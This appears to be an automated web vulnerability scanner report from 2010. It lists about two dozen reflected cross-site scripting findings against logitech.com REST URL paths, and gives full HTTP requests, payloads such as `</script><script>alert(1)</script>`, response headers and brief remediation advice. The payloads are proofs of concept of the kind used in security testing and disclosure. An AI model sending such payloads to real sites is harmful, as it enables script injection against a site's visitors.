The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45bcf"%3b0017888524f was submitted in the REST URL parameter 1. This input was echoed as 45bcf";0017888524f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /45bcf"%3b0017888524f/349/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c810b</script><script>alert(1)</script>99c808cae73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349c810b</script><script>alert(1)</script>99c808cae73/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8be"><script>alert(1)</script>e72bb459a28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349bc8be"><script>alert(1)</script>e72bb459a28/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c8d"><script>alert(1)</script>faf9570e677 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /70c8d"><script>alert(1)</script>faf9570e677/349/5787&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa904"%3b5ab02310847 was submitted in the REST URL parameter 1. This input was echoed as aa904";5ab02310847 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aa904"%3b5ab02310847/349/5787&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93054</script><script>alert(1)</script>d73a76966c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /93054</script><script>alert(1)</script>d73a76966c0/349/5787&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d620</script><script>alert(1)</script>d351ec8909 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/3492d620</script><script>alert(1)</script>d351ec8909/5787&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb42"><script>alert(1)</script>974622f35dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/3498eb42"><script>alert(1)</script>974622f35dd/5787&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2408a</script><script>alert(1)</script>310a8e740f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349/57872408a</script><script>alert(1)</script>310a8e740f4&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d1d"><script>alert(1)</script>9a84b9b64ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349/578763d1d"><script>alert(1)</script>9a84b9b64ac&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8852e</script><script>alert(1)</script>8f15e82261b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8852e</script><script>alert(1)</script>8f15e82261b/349/6135&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0da1"%3b86e607c7a8e was submitted in the REST URL parameter 1. This input was echoed as e0da1";86e607c7a8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e0da1"%3b86e607c7a8e/349/6135&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f29"><script>alert(1)</script>e73ce4a487a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e5f29"><script>alert(1)</script>e73ce4a487a/349/6135&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4cf3</script><script>alert(1)</script>62d561064da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349c4cf3</script><script>alert(1)</script>62d561064da/6135&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df011"><script>alert(1)</script>284ee1220b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349df011"><script>alert(1)</script>284ee1220b6/6135&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da18"><script>alert(1)</script>7ef9deb99f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349/61352da18"><script>alert(1)</script>7ef9deb99f3&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39552</script><script>alert(1)</script>718a53d6f07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349/613539552</script><script>alert(1)</script>718a53d6f07&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15e67"%3b9c7e4d60327 was submitted in the REST URL parameter 1. This input was echoed as 15e67";9c7e4d60327 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /15e67"%3b9c7e4d60327/349/7073&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa14"><script>alert(1)</script>bc45c901490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /efa14"><script>alert(1)</script>bc45c901490/349/7073&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d423d</script><script>alert(1)</script>c7ae8e78963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d423d</script><script>alert(1)</script>c7ae8e78963/349/7073&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce925</script><script>alert(1)</script>daaf7399d7f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349ce925</script><script>alert(1)</script>daaf7399d7f/7073&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 501b5"><script>alert(1)</script>b1dcfc32c04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349501b5"><script>alert(1)</script>b1dcfc32c04/7073&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee726</script><script>alert(1)</script>5ca7d7bc1cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349/7073ee726</script><script>alert(1)</script>5ca7d7bc1cf&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c83aa"><script>alert(1)</script>05778a0df38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349/7073c83aa"><script>alert(1)</script>05778a0df38&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f65b"><script>alert(1)</script>94b494536a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /7f65b"><script>alert(1)</script>94b494536a7/349/7077&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6afe"%3bb137238ef25 was submitted in the REST URL parameter 1. This input was echoed as c6afe";b137238ef25 in the application's response.
